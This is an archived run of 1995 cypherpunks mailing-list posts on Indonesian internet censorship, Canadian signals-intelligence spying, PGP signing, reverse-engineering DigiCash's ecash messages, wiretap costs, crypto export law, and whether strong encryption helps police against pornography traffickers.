> At 05:54 PM 11/17/95 -0500, "James M. Cobb" <jcobb@ahcbsd1.ovnet.com> wrote:

> >   Activists in Indonesia who use the Internet say it is a power- 
> >   ful tool for distributing information in a society where self- 
> >   censorship abounds, newspapers are tightly controlled, jour- 
> >   nalists are jailed and unlicensed magazines banned. 
> 
> The primary difference between Indonesian and Singaporean censorship
> is that the Singaporeans are a lot more urbane about it, and generally
> don't have crowds of protestors to shoot at.  Reporting on the East Timor
> activity is an especially good way to get kicked out of the country;
> I know people it's happened to.  Uncensorable communications can be
> a substantial help, though rubber-hose cryptanalysis is still fairly
> effective, and it's the type of place that would use it.
> 
> A certain amount of US activism on the East Timor problems is Internet-based;
> I don't know how connected it is to Indonesia or East Timor, which is
> too underdeveloped to be very active on the net, and has the added problem
> that activists are heavily watched.

I'll try to keep this as short as possible...

Almost anything on the Internet about East Timor is just crap. Get that out
of the way first. I've put the entire Portugal domain in my kill file. It's
like reading the lowest grade of anti-abortion rant from an AOLer.

The issue under all the others is "what happens when Suharto dies". 
Lots of people, both in and out of power, are biding their time until
Suharto leaves power.

My hunch is that practically nobody in Indonesia has a PC at home like
most US Internet users do. They're getting access through a company or
university, or through a government office. A distributed network can
resist censorship--but Indonesia isn't very distributed yet, and almost
everyone is dependent on some sort of institutional access. Most people
in Indonesia--including a lot of middle-class people--don't have a phone.
You run down the street to a government Telkom office or a private 
Wartel office to make a phone call. Putting Web terminals in Wartels--
now *that* would be a concept.

If you dig into the UUCP maps for Java, you'll see a surprising number
of sites listed in all sorts of little places. How many of those are
up and operating, I have no idea. You are routinely warned that people
at those sites are generally charged for receiving foreign e-mail, and
that that can be expensive for them at current exchange rates.

Private Internet providers (RadNet, IDOLA, IndoNet) have popped up
only in the last year or so. I have links to some from my home page
(http://www.skypoint.com/members/gimonca)

As for the rubber hose...Indonesia is a fairly inscrutable country to
try to figure out. They are quite capable of simply killing people if
necessary; at other times, the wheels of justice turn agonizingly slow,
and people are left free for the moment not knowing what might end up
happening (a la Phil Zimmermann). My at-a-distance impression is that
you see more of the Alabama-Sheriff's-Deputy kind of oppression than 
the Nazi-jackboot kind. Either way, it's millions of light years from
the Libertarian Home World.

Technology is a hot issue in Indonesia, partly because one of Suharto's
favorite ministers, Mr. Habibie, is kind of a techno-nut, and has been
pushing a variety of medium- and high-tech projects for Indonesia. Some
people feel that he's being allowed to do whatever he wants, regardless
as to whether his projects make any economic sense or not. After Suharto
is gone, it will be interesting to see how high-tech stuff fares. In
short, will Habibie end up giving it a bad name? Or will the technological
middle class come to power and do it right the second time around?

I'm going to stop rambling, and add something of more crypto-relevance.
I've got an old article of mine about remailers in my web pages.
(http://www.skypoint.com/members/gimonca/anonmail.html) I've talked it
up in soc.culture.indonesia and soc.culture.malaysia. Later, sameer
asked me to put a link to c2.org in there. Now, I'm getting a low but
respectable number of hits on that page (30-40 per day)...so it's not
out of the question that some of those Indonesian users might be 
finding their way to sameer's site for a badly-needed nym.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 18 Nov 95 06:07:15 PST
To: cypherpunks@toad.com
Subject: CANADIAN PRESS REPORTS (was Re: CSE gets flak on TV)
Message-ID: <199511181405.GAA10722@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 17 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> > Hmm, actually the news tape is reading a little strange here in Canada.
> > Not AP, or REUTERS, but simply the Canadian Press newswire.

     [snip]

> Taking three successive news stories from three days ... (press stories,
> I've since pulled for my own reference) and pasting them together to
> indicate some type of Machiaevellian?? (sp) exercise is simply "not done." 

I still feel such a sense of violation with what LD did, such an utter
sense of helplessness at the character assassination I've suffered at his
hands, that I feel that I must take some token action to "set the
record straight".  Something which clears my name.

Here is the TRUE unedited story for the list which Detweiler felt he
had to TWIST to the nth degree.  His attempt at making mountains out
of mole hills will not succeed with this one.

I won't have him attack me, and attack everything I'm trying to
achieve on this list, through his games.  It's a non-starter from the
get go, LD.

Here's what was truly written ... let the list decide for itself.



COMMUNICATIONS SECURITY ESTABLISHMENT
Canada spied on allies: ex-agent

Top secret security agency accused of eavesdropping
on South Koreans by former analyst

The Canadian Press 
TORONTO

  Canada's electronic espionage agency has spied on friendly countries
such as South Korea, Mexico and Japan despite Ottawa's denials, a
former agent has told CTV News.
  "I have lived with this information for so long and I just think
that it is time that Canada knows what CSE is doing, " Jane Shorten
said in a report for broadcast late Sunday.
  Shorten, 38, worked as an analyst from 1986 to 1994 -- when she was
laid off -- for the Communications Security Establishment (CSE), CTV
reports.
  A separate entity from the better known Canadian Security
Intelligence Service, CSE can be described as a technological peeping
tom.  It specializes in electronic espionage, monitoring radio and
other transmissions for useful information.
  The Soviets and their allies were once the prime targets of such
surveillance, but after the thaw in the Cold War, CSE shifted its
attention to friendly countries, Shorten told CTV.
  The agency spied on Canada's allies and trading partners,
eavesdropping on friendly embassies, consulates, diplomats in Canada
and around the world, she said.
  Ottawa denies it.  "Countries like Canada have understandings that
they don't carry out these activities against each other, " Solicitor
General Herb Gray said earlier this year in response to claims that
the U.S. Central Intelligence Agency had spied on the Japanese
delegation during auto trade talks in Geneva.
  Replies Shorten: "He does not know what's going on because CSE is
certainly doing that ... I spied on the (South) Korean government for
the Canadian government."
  CSE is part of the Defence Department but Shorten insists senior
officials at the Foreign Affairs Department were fully aware of its
activities and anxious for its information.
  "I know my reports went to the Ministry of Foreign Affairs," Shorten
told CTV. "My reports were classified as Top Secret Umbra and that's
as high as you can get, and these people were cleared to get that kind
of information."
  Shorten, once described by a superior as a gifted intelligence
analyst, told CTV she was aware her revelations could result in
prosecution under the Official Secrets Act but felt the risk of prison
was worth it.
  "I feel so strongly that it's time that people learned what CSE is
all about," she said.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Sat, 18 Nov 95 14:36:10 PST
To: cypherpunks@toad.com
Subject: Re: protecting against impersonation (was: CANADIAN PRESS REPORTS)
Message-ID: <m0tGv2j-0008zeC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>anonymous writes:
>> I still feel such a sense of violation with what LD did, such an
>> utter sense of helplessness at the character assassination I've
>> suffered at his hands, 
>
>So use PGP, sign your messages.  Simple solution.

Absolutely!  Anybody who uses anonymous remailers to post to public areas,
and does not use digital signatures to prevent spoofing when it is obviously
needed, is a fool or worse.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
Date: Tue, 21 Nov 95 13:47:02 PST
To: cypherpunks@toad.com
Subject: ecash protocol: Part 1
Message-ID: <199511212146.NAA11456@cory.EECS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Well, I dropped off the net for a few days due to a midterm, but I'm
back now...

Last week, I was taking a look at the ecash protocol (no, I don't have a copy;
I have a binary, which I can't even run...).  

I've managed to decipher a useful bit of the first message sent from
the shop to the payer.  It's the Payment Request, and contains the following
information:

o Header identifying packet as Payment Request
o The integer 4
o The payment amount, in cents
o The time (seconds since 1970)
o The integer 79
o The name of the shop (payee)
o A description of the item being paid for
o An empty string
o The integer 0
o End of Record marker

I don't know what the 4, 79, empty string, and 0 are for.  I assume one
of them (probably the 4) is some indication of currency (US cents).
I can provide a byte-level description of the record, if people want.

I guess the important bit is that the payee, the item being bought,
and the cost are sent _in the clear_.  Some of the people I've talked
to think this is a huge privacy breach, and some don't.  You all can
debate this now.  Lucky can, if he wishes, add insight, and/or tell us
what DC may do about this.

I'll try to figure out the rest of the fields, and some of the other
messages (like the payment itself).

   - Ian "Why exactly isn't DigiCash releasing the protocol?  What about
	    the source?"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 21 Nov 95 13:51:04 PST
To: pcw@access.digex.net (Peter Wayner)
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
Message-ID: <199511212150.QAA02220@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:05 AM 11/21/95 -0500, Peter Wayner wrote:

>Has anyone ever done the math on the FBI's new wire tapping
>proposals and determined whether they'll have enough agents to
>do all of the listening? Doesn't a court ordered wire tap
>require that people listen in and screen the recordings. Does

No.  Automatic equipment (pen registers) is almost as old as wiretaps.

>12,500 agents would cost $1.2 billion a year if they each cost
>about $100,000 in salary and benefits. But we need to account
>for vacations, shift work and testifying the trials of the drug
>lords who are sent to jail. Let's assume that you only need
>1/10th the people to handle the two evening shifts. That gives
>you a cost of $1.4 billion before vacations. Adding 40% to cover
>vacation and weekends puts you close to $2 billion. Let's round
>up.

The bodies are still needed for management, analysis, arrest, prosecution,
and punishment.  Until Robocop is deployed, the criminal justice system will
be a labor intensive effort.  This is still good news for us though.  Anyone
who's been in business (say George McGovern after his Connecticut inn
bankruptcy) can tell you that people are the most expensive part of a
business.  You pay all that cash each year and at the end of the year you
have nothing concrete to show for it.  You are just buying time.  Labor
costs become more of a problem as the quantity and value of capital goods
increases since the more slowly increasing factor (labor) is bid up.  Thus
people cost a lot more these days than they did in 1800 because capital
goods (per unit) are much cheaper than they used to be.

(Ignore temporary changes in returns to labor as women, 3rd world residents,
or freed commie slaves join the labor force.  They are quickly absorbed.
Wants are unlimited.)

Now the increasing cost of labor is not a problem if those workers are
producing goods of value.  They are "making" their own earnings.  If they
are in a parasitic profession, however, -- one that subsists on what it
steals from others -- the rising cost of labor means that that institution
has to steal more and more to keep up.  Eventually, the speed of economic
change can swamp the theft ability of such an organization.

Such swamping occurs because market entities support their own growth or
they don't grow.  Since they lift themselves up, growth is unlimited.
Parasitic entities on the other hand are limited by the strength and
susceptibility of their host.  Hosts may weaken if the parasite grows too
much or it may find a way to cast off the parasite.  No one rejects a market
economic actor that is a potential customer or employer but parasites are
rejected whenever possible.

Market Earth on the nets gives us many opportunities to both fuel fast
growth and shake off parasites.  It is perfectly possible for markets to
outbid the secret police for the labor of its agents given the compound
growth rates that are a feature of friction-free capitalism.

DCF

"Don't call it Anarchy.  Call it Disintermediation."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Tue, 21 Nov 95 21:37:43 PST
To: remailer-operators@c2.org
Subject: Re: Syrinx Remailer is no more
Message-ID: <acd8650b03021004a42c@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This is the kind of announcement which really needs to be authenticated.
I will leave syrinx on my list until I see a signed message confirming this
announcement. If we do not bother to authenticate this kind of message, why
bother with all the crypto, here is the mother of all denial of service
attacks.


        -Lance

At 7:22 PM 11/21/95, Sam Kaplin wrote:
>Effective immediately syrinx@c2.org is no more. I no longer have the
>time to keep this remailer up and running. Perhaps somewhere down the
>line I will set up another one. Please remove Syrinx from your chains.
>
>Sam

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMLK1+vPzr81BVjMVAQHgoAf/TpVsZ+St9vz4ix5PLaabP60ybJRATE+V
t2iBxQmxRqhOcdVPZJU1An5pUdCOCgB3amLXNJXkMnoOasi/0ps3igOw0uFaFUf8
ZgCvM4MfNsdPfduCRfsb+5a1IvTkhmP6oapX9lUXDB5a4nHRQvtXkt96sg2hgaIj
sqwPpGFaFvLhkiqQ971CL3+EV4+0GkZ3iH2g5pQ2BD6iACVBReINgCuyi/LiNbvZ
yGBguPb38VTCDWbzancgQVrMEzTdwcQrmhfhHDO/5H5g6reWrEMioKGWScTZgxH1
fMs40LXxwu25cUziywYjgw9uhEEQu1K1GY7sVE3CoPPenRfcKAutsA==
=c2AJ
-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 21 Nov 95 21:45:56 PST
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security [NOISE]
In-Reply-To: <yo9XeD2w165w@bwalk.dm.com>
Message-ID: <9511220545.AA01344@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



I'm not sure where the policy of whether posts from foo.com should be
considered policy of foo.com but they certainly are considered in that
manner.

Rather than have this discussion here how about people read up the threat in
Hal Abelson's course on Ethics of the Electronic frontier?

http://swissnet.ai.mit.edu/6095/on-line-discussion/topic-1/

One point to be made is that at Universities we all have university accounts 
because people realise that there is no connection between our views and 
institute policy. The freedom to hold unpopular views being part of what 
universities are all about. On the other hand there is no such assumption 
concerning posts from foo.com.

I suspect that even in the UK one could sack an employee for making stupid 
statements from an Internet account. Particularly if they might lead a person to 
doubt the sanity of the person concerned.

On Phil Stromer, I don't think the Internet posts were the only point at issue. 
He was very offensive however, it was not merely the views he posted but the 
manner in which he made them that caused offense. He also made a lot of 
assertions concerning other posters which might have led to legal action 
against Sun.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 22 Nov 95 04:10:13 PST
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security [NOISE]
In-Reply-To: <199511221048.CAA26409@jobe.shell.portal.com>
Message-ID: <i6uyeD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice de Nonymous writes:
> What I'm trying to say is that if someone posts from watson.ibm.com,
> and IF they are talking about OS/2, we will not accept that they are
> not speaking independently of the knowledge they have garnered from
> watson.

I fully agree. I'm not arguing with you.

> In the same way, someone who writes from Netscape.com or AT&T, or Sun
> and tries to disclaim that they are speaking for the company, when
> they step out as an employee of a company is deluding themselves.

If you meant "disclaim that they are NOT speaking for the company", then that's
what I was saying too. Moreover, I think that if someone known to work for Sun
posts from Netcom about Sun products, policies, and future plans, s/he'll have
both higher credibility and higher responsibility to the readers than a
proverbial person from the street.

(Sorry for not being able to take this to e-mail.)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 22 Nov 95 09:09:18 PST
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: Secrets of the Internet
In-Reply-To: <Pine.BSD.3.91.951122041435.28519I-100000@ahcbsd1.ovnet.com>
Message-ID: <Pine.SOL.3.91.951122090738.23852B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 Nov 1995, James M. Cobb wrote:
>            known as PGP -- Pretty Good Privacy -- 
> and 
>    Experts estimate that it could take 10 years for computer 
>    systems to crack the individual codes. 

Never underestimate the power of GCHQ- when they unfreeze Alan Turing 
from the cryogenic vault, good things happen.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 22 Nov 95 08:10:33 PST
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: rand-test
In-Reply-To: <Pine.BSD.3.91.951122041655.28519J-100000@ahcbsd1.ovnet.com>
Message-ID: <199511221609.LAA21172@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"James M. Cobb" writes:
> Friend, 
>  
>  
> The following information from 

1) You are not my friend.

2) My private mail to you hasn't convinced you to stop this barrage of
   reposts. Would you please do so?

.pm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Wed, 22 Nov 95 08:51:06 PST
To: raph@c2.org
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <199511212323.PAA02457@comsec.com>
Message-ID: <9511221641.AA14712@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Sat, 18 Nov 1995 00:42:21 -0800 (PST)
>From: Raph Levien <raph@c2.org>


>   First, a few words about what I consider to be good interface that
>can support plug-in crypto.

[...]

>   I propose that the new interface lives as a sort of daemon, rather
>than a static collection of command line script pieces. 

Danger, Will Robinson!  (see below)

[...]


>   Once the negotiation has been established, the application can send
>the daemon MIME objects that the app does not understand but the
>daemon does (for example, an image/fractal). The daemon can return a
>MIME object that the app does understand (for example, an image/ppm).

This part sounds good...a sort of master translation service.

>   Alternatively, the daemon may request an authentication. This is
>useful when resolving external bodies that require authentication,
>including non-anonymous FTP, and standard authenticated HTTP. In this
>case, the daemon sends a message to the app requesting the
>authentication. It specifies whether it needs both username and
>password, or just password. In the latter case, it hands a username to
>the application.
>   The application can then query the user for the authentication
>data. It hands this back to the daemon. In reply, the daemon indicates
>success or failure. In case of success, it hands the object back to
>the app.

Now I get worried.  This communication with the demon is via some IPC --
maybe even via a LAN.  Some things can't be distributed safely and
authentication is #2 on my list.

>   Encryption is a bit more tricky, but in essence you just hang a
>premail-alike off this kind of protocol. The hard part is specifying
>the key, but you just call it a "parameter" and put in hooks for the
>daemon to ask for whatever parameters it needs. 

Crypto keys are #1 on my list of things you can't distribute (unless they
are wrapped, of course).

>						 This requires that
>keys have some nonforgeable names, which is unfortunately not a
>feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the
>Certification Authority (<wink> at Nick Szabo).

Public keys, if that's what you're talking about, have perfectly good
nonforgeable names -- themselves.  They are unique.  They are the proper
name which can collect all the attributes of that key which are of interest
(e.g., permission to spend $, name of a human who knows the private key,
attributes about that human, etc.).

>   One final aside: I've been fairly frustrated with this mailing list
>as a forum for talking about real design proposals and implementation
>issues. Ignorant posts by the likes of Dr. Fred and Alice d'Clueless
>tend to attract far more attention than real crypto work. I want a
>forum for, and just for, cypherpunks who write code. If I had just a
>smidgen more free time (as if), I'd be trying to start one
>myself. Anyone else?

I've seen this happen several times.  As a list gets popular, it
diversifies.  You might try sci.crypt.research -- since it's moderated.

 - Carl


+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Wed, 22 Nov 95 08:54:21 PST
To: cypherpunks@toad.com
Subject: Re: Pedophiles use encoding devices to make secret use of Internet
Message-ID: <Pine.BSD/.3.91.951122114132.23151A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain


I guess they moved the URL. Try this one.

http://www.nando.net/newsroom/ntn/info/112195/info429_4.html

      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Wed, 22 Nov 95 17:14:11 PST
To: cypherpunks@toad.com
Subject: Re: Spam the Sign!
Message-ID: <199511230113.RAA01841@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> > 
> >         I do what RSADSI does with ftp.rsa.com. It requires a cronjob
> > and sed. I didn't get the NSA to approve it, but I figure if it's good
> > enough for RSADSI it's good enough for me.
> 
>   Do you have a legal opinion to support this statement?  Our lawyers
> tell us that executives of netscape could go to jail if we make the
> 128bit version of netscape available from an "export controlled"
> ftp or http server.  We are working to clarify the situation with
> the government or figure out an alternative distribution scheme that
> will remove us from the grey area.
> 
>   Getting the US version of netscape widely available is one of my
> highest priorities, but I can't tell Barksdale that he should go to
> jail over it.  I'm constantly pushing from within the company to keep
> things moving forward.

Actually ;-) Barksdale going to jail would probably advance the cause of
strong cryptography more than anything I can think of.  Can you imagine
the media circus when he's led out the door in handcuffs?  A man worth
somewhere around a billion dollars being arrested for trying to give away
his product?  Court reporters trying to explain ITAR to the public?  The
mind boggles.

... and he looked over at me and said, "What are ya in for?" and I said,
"Giving away free software," and they all moved away from me on the bench ...

You guys didn't get to where you are now waiting around for HTML v3.0 to
be approved.  There must be some way to challenge an attempt to use ITAR
to stop the DOMESTIC spread of strong crypto that doesn't involve the
incarceration of your top executives ...

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: post@txcc.net
Date: Wed, 22 Nov 95 16:47:10 PST
To: perry@piermont.com
Subject: Re: PROPOSAL: cypherpunks-news@toad.com? (was: rand-test)
Message-ID: <199511230245.SAA00660@txcc.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:28 PM 11/22/95 -0500, you wrote:
>
>A.Back@exeter.ac.uk writes:
>> It is much more efficient of list bandwidth to post short pointers
>> only, of the style John Young <jya@pipeline.com> posts.
>
>I agree with you.  John's posts are not always strictly on topic but
>they are always just pointers, and he typically posts them in a single
>group a day. They are also always very high quality information. I
>find them to be perfectly fine. 
>
>The recent "Friend;" stuff just annoyed me, though.
>
>Perry
>
>
I agree with you.

Sid





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 22 Nov 95 19:08:07 PST
To: iang@cs.berkeley.edu
Subject: Re: ecash protocol: Part 1
Message-ID: <v02120d05acd986f50e5e@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



> From what I gathered from Doug's posts a little while back, the _client_
>stuff is perfectly fine; only the _bank_ stuff is Chaum-patented.
>

This is exactly backwards. Also, it is entirely possible that they
have structured the protocol to make sure that both sides have to
practice some element of Digicash intellectual property. What I
said was "it is possible to create an anonymous digital cash system
where the bank does not infringe and the client can optionally
infringe or not infringe (sacrificing anonymity)."

(See: http://www.communities.com/paper/agnostic.html)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc>
Date: Wed, 22 Nov 95 19:49:05 PST
To: sunder@amanda.dorsai.org (Ray Arachelian)
Subject: Re: Visual Basic 4.0 encryption prog.
In-Reply-To: <Pine.SUN.3.91.951122153315.26251W@amanda.dorsai.org>
Message-ID: <199511230443.WAA07909@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> But there is no reason why this isn't possible in ANY language.  You'll 
> just have to write a lot of code by hand, or port to VB... especially the 
> large-number routines.

I don't see any reason why crypto routines written in C can't be 
converted to .DLL files - then you can call them from VB or whatever.  No 
need to convert them to VB.
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLP75yS9AwzY9LDxAQFNOAP+JizKSm76+ktgzM7mbF05l5KwwfIDVL2u
kPsL9aIEmQLNl9IfF6Q/ROPTL8U9QJRdzUhyOPTlCV2TFZfA48e4W68Nqa6AX+up
lMedQuxIjqclK8vJzj1uKOP0/HhbOyn1RLLwthNGWXXt+WM882Vq6NES/eB+kwGN
o3/fDEMIg2g=
=PhJu
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "banjo, lord of the sea monkeys" <kelli@zeus.towson.edu>
Date: Wed, 22 Nov 95 20:52:53 PST
To: cypherpunks@toad.com
Subject: Nicholas Negroponte interview in MEME
Message-ID: <Pine.ULT.3.91.951122234358.4115A-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain



The latest issue of MEME has a pretty good interview with Nicholas 
Negroponte of the MIT Media Lab.  Some privacy issues are discussed, the 
idea of intellectual property is touched on, as well as some other good 
stuff.

I'm not sure if it's on the web, but I'll forward the interview to anyone 
who would like to have it.

K. Ellis


OBCrypto:  How's it going, Perry?  

<grin>
Kathleen M. Ellis     http://zeus.towson.edu/~kelli/     kelli@zeus.towson.edu
Diverse Sexual Orientation Collec. Towson State University DSOC@zeus.towson.edu
"Your friends are really just enemies who don't have the guts to kill you"
       							-J. Tenuta






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Thu, 23 Nov 95 00:12:11 PST
To: Carl Ellison <cme@clark.net>
Subject: Re: crypto for porno users
Message-ID: <199511230817.AAA22826@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>	a) "no one on the net knows you're a dog" implies that police can
>	pose as a fellow porn producer or consumer and get away with it
>	more easily.
>
>	b) strong crypto for communications between porn users encourages
>	them to speak more freely.  When one of the two is a police officer
>	in disguise, that encourages the other (the suspect) to reveal more,
>	making the investigation proceed more quickly.  Knowing that the
>	crypto is strong enough to keep government eavesdroppers out, the
>	sender is given a false sense of security -- is distracted from
>	thinking about the trustworthiness of the receiver while thinking
>	about the security of the channel itself.

A common way to get around prostitution sting operations is to ask the lady
to expose sensitive portions of her anatomy to prove her sincerity before
the would-be customer commits to any transactions; this sort of thing is
also becoming commonplace on the net for pornography or pirated software,
too. Would-be traffickers often ask a prospective recipient for a small chunk
of fresh files in advance, before passing back anything serious .. partially
out of suspicion, mostly out of greed, but to the same end. A law
enforcement team would be stepping onto shaky ground if they were forced to
transfer illegal images/etc to a suspected trafficker before getting evidence
from him. Entrapment is an ugly concept.

>3. Encryption of porn would work against the kind of porn distribution
>	found on the alt.binary.pictures.erotic... newsgroups.  Encryption
>	requires that recipients be identified.

Not at all .. a porn distributor could generate a key pair, use part A to
encode the images, and disseminate part B thru a variety of outlets -
publicly posted, sold, passed thru an informal network of like-minded
netizens...

>4. Personal file encryption encourages individuals dealing with porn to
>	encrypt and keep personal diaries which might contain evidence.
>	Since PGP is subject to brute force passphrase attacks, this gives
>	an attack which will open *some* of these diaries.  Without the
>	encryption, the suspect is less likely to keep the diary in the
>	first place.  This isn't a guaranteed opening into all such
>	diaries.  There is no such guarantee possible.  Rather, this
>	suggests that strong crypto has a chance to maximize the effective
>	"take" by LE forces.

I would argue the exact opposite - strong crypto would tend to minimize the
effective take, since there's no guarantee that /anything/ on a perp's
system will be in the clear. I'll let someone else with a better background
pound on the 'brute force' section.

--
   Jay Campbell                edge@got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Wed, 22 Nov 95 22:34:06 PST
To: cypherpunks@toad.com
Subject: crypto for porno users
Message-ID: <199511230633.BAA05538@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


I hear occasional uproar from LE types about porno traffickers using strong
crypto like PGP.

[I've been known occasionally to say things for their shock value, but this
time I'm quite serious.]

		------------------------------

As a society wanting to limit the spread of porn, we should encourage those
trafficking in porn to use strong crypto.

1. If two people are sending porn from one to another over the net, the net
	is so insecure that many people along the way could see it.  The
	recipient field could be mistyped, as well.  Either way, someone
	who doesn't want the porn could receive it and be offended.  Strong
	crypto wrapping that porn protects the innocent accidental
	recipient from exposure to the porn.

2. If cops want to track down some pornographer (e.g., because he's dealing
	in child porn), the net and strong crypto provide two opportunities
	to the police:

	a) "no one on the net knows you're a dog" implies that police can
	pose as a fellow porn producer or consumer and get away with it
	more easily.

	b) strong crypto for communications between porn users encourages
	them to speak more freely.  When one of the two is a police officer
	in disguise, that encourages the other (the suspect) to reveal more,
	making the investigation proceed more quickly.  Knowing that the
	crypto is strong enough to keep government eavesdroppers out, the
	sender is given a false sense of security -- is distracted from
	thinking about the trustworthiness of the receiver while thinking
	about the security of the channel itself.

3. Encryption of porn would work against the kind of porn distribution
	found on the alt.binary.pictures.erotic... newsgroups.  Encryption
	requires that recipients be identified.

4. Personal file encryption encourages individuals dealing with porn to
	encrypt and keep personal diaries which might contain evidence.
	Since PGP is subject to brute force passphrase attacks, this gives
	an attack which will open *some* of these diaries.  Without the
	encryption, the suspect is less likely to keep the diary in the
	first place.  This isn't a guaranteed opening into all such
	diaries.  There is no such guarantee possible.  Rather, this
	suggests that strong crypto has a chance to maximize the effective
	"take" by LE forces.


These advantages are balanced against the possibility that there is some
group of pornographers who communicate together, who are identified by the
police, who would be wiretapped *and* who are not infiltrated -- and
therefore whose conversations are unavailable to the police.  The larger
such a group, the less likely it will remain non-infiltrated, so these
groups are probably very small.  There might be some of these -- just as
there might be a few pornographers who have diaries that are encrypted and
unbreakable.  However, strong crypto opens a number of opportunities for
successful investigation -- and it's my guess that in the balance, strong
crypto adds up as a net advantage to the police rather than a net drawback.

 - Carl

 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 23 Nov 95 03:08:12 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: generating provable primes
